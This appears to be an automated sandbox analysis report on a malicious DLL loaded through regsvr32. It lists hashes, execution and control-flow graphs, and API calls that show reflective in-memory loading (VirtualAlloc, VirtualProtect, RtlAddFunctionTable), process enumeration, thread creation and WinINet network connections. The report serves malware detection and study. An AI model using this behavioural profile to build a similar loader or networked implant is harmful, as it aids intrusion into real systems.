                                                                    • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                    • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:18.8%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:4.8%
                                                                    Total number of Nodes:83
                                                                    Total number of Limit Nodes:8
                                                                    execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 180015388 3920 1800227d4 3917->3920 3919 1800153e3 3924 18002281d 3920->3924 3922 180024315 3922->3919 3924->3922 3926 18001c05c 3924->3926 3930 18001c568 3924->3930 3937 180017908 3924->3937 3928 18001c0af 3926->3928 3929 18001c2e1 3928->3929 3941 18002ad58 3928->3941 3929->3924 3933 18001c58a 3930->3933 3932 18001c948 3932->3924 3933->3932 3948 180003598 3933->3948 3952 18000ac48 3933->3952 3956 180025dac 3933->3956 3960 1800097c0 3933->3960 3939 180017932 3937->3939 3938 180015e2c CreateThread 3938->3939 3939->3938 3940 180017bcd 3939->3940 3940->3924 3944 1800046a8 3941->3944 3943 18002ae38 3943->3928 3946 1800046ec 3944->3946 3945 180004982 3945->3943 3946->3945 3947 180004945 Process32FirstW 3946->3947 3947->3946 3950 180003640 3948->3950 3949 1800044c0 3949->3933 3950->3949 3964 18001ed50 3950->3964 3954 18000ac8e 3952->3954 3953 18000b5fe 3953->3933 3954->3953 3955 18001ed50 CreateFileW 3954->3955 3955->3954 3959 180025dde 3956->3959 3958 180026180 3958->3933 3959->3958 3971 180015e2c 3959->3971 3961 1800097fc 3960->3961 3962 18000981d 3961->3962 3963 18001ed50 CreateFileW 3961->3963 3962->3933 3963->3961 3966 18001ed7a 3964->3966 3967 18001f06b 3966->3967 3968 18000fb00 3966->3968 3967->3950 3970 18000fb80 3968->3970 3969 18000fc15 CreateFileW 3969->3966 3970->3969 3973 180015ea5 3971->3973 3972 180015f3b CreateThread 3972->3959 3973->3972 3974 180015e2c 3976 180015ea5 3974->3976 3975 180015f3b CreateThread 3976->3975 3998 18001496c 4001 1800149ce 3998->4001 3999 1800152ba 4000 18000fb00 CreateFileW 4000->4001 4001->3999 4001->4000 3977 180024d80 3979 180024eed 3977->3979 3978 1800250bd 3979->3978 3981 180019a30 3979->3981 3982 180019aa4 3981->3982 3983 180019b2a GetVolumeInformationW 3982->3983 3983->3978 3984 ee0000 3985 ee0183 3984->3985 3986 ee043e VirtualAlloc 3985->3986 3990 ee0462 3986->3990 3987 ee0a7b 3988 ee0531 GetNativeSystemInfo 3988->3987 3989 ee056d VirtualAlloc 3988->3989 3993 ee058b 3989->3993 3990->3987 3990->3988 3991 ee0a00 3991->3987 3992 ee0a56 RtlAddFunctionTable 3991->3992 3992->3987 3993->3991 3994 ee09d9 VirtualProtect 3993->3994 3994->3993 3995 18000fb00 3997 18000fb80 3995->3997 3996 18000fc15 CreateFileW 3997->3996

                                                                    Executed Functions

                                                                    Function 00EE0000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 ee0000-ee0460 call ee0aa8 * 2 VirtualAlloc 22 ee048a-ee0494 0->22 23 ee0462-ee0466 0->23 26 ee049a-ee049e 22->26 27 ee0a91-ee0aa6 22->27 24 ee0468-ee0488 23->24 24->22 24->24 26->27 28 ee04a4-ee04a8 26->28 28->27 29 ee04ae-ee04b2 28->29 29->27 30 ee04b8-ee04bf 29->30 30->27 31 ee04c5-ee04d2 30->31 31->27 32 ee04d8-ee04e1 31->32 32->27 33 ee04e7-ee04f4 32->33 33->27 34 ee04fa-ee0507 33->34 35 ee0509-ee0511 34->35 36 ee0531-ee0567 GetNativeSystemInfo 34->36 37 ee0513-ee0518 35->37 36->27 38 ee056d-ee0589 VirtualAlloc 36->38 39 ee051a-ee051f 37->39 40 ee0521 37->40 41 ee058b-ee059e 38->41 42 ee05a0-ee05ac 38->42 44 ee0523-ee052f 39->44 40->44 41->42 43 ee05af-ee05b2 42->43 45 ee05b4-ee05bf 43->45 46 ee05c1-ee05db 43->46 44->36 44->37 45->43 48 ee05dd-ee05e2 46->48 49 ee061b-ee0622 46->49 50 ee05e4-ee05ea 48->50 51 ee06db-ee06e2 49->51 52 ee0628-ee062f 49->52 53 ee05ec-ee0609 50->53 54 ee060b-ee0619 50->54 56 ee06e8-ee06f9 51->56 57 ee0864-ee086b 51->57 52->51 55 ee0635-ee0642 52->55 53->53 53->54 54->49 54->50 55->51 60 ee0648-ee064f 55->60 61 ee0702-ee0705 56->61 58 ee0917-ee0929 57->58 59 ee0871-ee087f 57->59 62 ee092f-ee0937 58->62 63 ee0a07-ee0a1a 58->63 64 ee090e-ee0911 59->64 65 ee0654-ee0658 60->65 66 ee06fb-ee06ff 61->66 67 ee0707-ee070a 61->67 69 ee093b-ee093f 62->69 81 ee0a1c-ee0a27 63->81 82 ee0a40-ee0a4a 63->82 64->58 68 ee0884-ee08a9 64->68 70 ee06c0-ee06ca 65->70 66->61 71 ee070c-ee071d 67->71 72 ee0788-ee078e 67->72 101 ee08ab-ee08b1 68->101 102 ee0907-ee090c 68->102 78 ee09ec-ee09fa 69->78 79 ee0945-ee095a 69->79 76 ee06cc-ee06d2 70->76 77 ee065a-ee0669 70->77 73 ee071f-ee0720 71->73 74 ee0794-ee07a2 71->74 72->74 80 ee0722-ee0784 73->80 83 ee085d-ee085e 74->83 84 ee07a8 74->84 76->65 85 ee06d4-ee06d5 76->85 89 ee067a-ee067e 77->89 90 ee066b-ee0678 77->90 78->69 91 ee0a00-ee0a01 78->91 87 ee095c-ee095e 79->87 88 ee097b-ee097d 79->88 80->80 96 ee0786 80->96 97 ee0a38-ee0a3e 81->97 99 ee0a4c-ee0a54 82->99 100 ee0a7b-ee0a8e 82->100 83->57 98 ee07ae-ee07d4 84->98 85->51 103 ee096e-ee0979 87->103 104 ee0960-ee096c 87->104 92 ee097f-ee0981 88->92 93 ee09a2-ee09a4 88->93 94 ee068c-ee0690 89->94 95 ee0680-ee068a 89->95 105 ee06bd-ee06be 90->105 91->63 109 ee0989-ee098b 92->109 110 ee0983-ee0987 92->110 114 ee09ac-ee09bb 93->114 115 ee09a6-ee09aa 93->115 112 ee06a5-ee06a9 94->112 113 ee0692-ee06a3 94->113 111 ee06b6-ee06ba 95->111 96->74 97->82 106 ee0a29-ee0a35 97->106 127 ee07d6-ee07d9 98->127 128 ee0835-ee0839 98->128 99->100 107 ee0a56-ee0a79 RtlAddFunctionTable 99->107 100->27 116 ee08bb-ee08c8 101->116 117 ee08b3-ee08b9 101->117 102->64 108 ee09be-ee09bf 103->108 104->108 105->70 106->97 107->100 124 ee09c5-ee09cb 108->124 109->93 122 ee098d-ee098f 109->122 110->108 111->105 112->105 123 ee06ab-ee06b3 112->123 113->111 114->108 115->108 118 ee08ca-ee08d1 116->118 119 ee08d3-ee08e5 116->119 125 ee08ea-ee08fe 117->125 118->118 118->119 119->125 129 ee0999-ee09a0 122->129 130 ee0991-ee0997 122->130 123->111 131 ee09cd-ee09d3 124->131 132 ee09d9-ee09e9 VirtualProtect 124->132 125->102 138 ee0900-ee0905 125->138 134 ee07db-ee07e1 127->134 135 ee07e3-ee07f0 127->135 136 ee083b 128->136 137 ee0844-ee0850 128->137 129->124 130->108 131->132 132->78 139 ee0812-ee082c 134->139 140 ee07fb-ee080d 135->140 141 ee07f2-ee07f9 135->141 136->137 137->98 142 ee0856-ee0857 137->142 138->101 139->128 144 ee082e-ee0833 139->144 140->139 141->140 141->141 142->83 144->127
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743839150.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_ee0000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: a536d895039eab51a915c0b39b7b5e3780752f109c1ae9e98df55b85ca5de063
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 1272E630618B8C8FCB29DF19C8856B9B7E1FB98305F10562DE8CAD7211DB74D986CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000D26C Relevance: 7.9, Strings: 6, Instructions: 361COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$Ec;$J$^c$^c$n
                                                                    • API String ID: 0-2929744921
                                                                    • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                    • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                    • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                    • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00000001800046A8 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5IF$P)#
                                                                    • API String ID: 0-1025399686
                                                                    • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                    • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                    • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                    • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018001CEC4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89networkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: :G?$C
                                                                    • API String ID: 3050416762-1225920220
                                                                    • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                    • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                    • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                    • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000FB00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: gF\
                                                                    • API String ID: 823142352-1982329323
                                                                    • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                    • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                    • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                    • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000018000A4FC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: :G?
                                                                    • API String ID: 1984915467-1508054202
                                                                    • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                    • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                    • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                    • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180012B50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: :G?
                                                                    • API String ID: 2038078732-1508054202
                                                                    • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                    • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                    • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                    • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180015E2C Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                    • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                    • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                    • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0000000180019A30 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.743975556.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationVolume
                                                                    • String ID:
                                                                    • API String ID: 2039140958-0
                                                                    • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                    • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                    • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                    • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%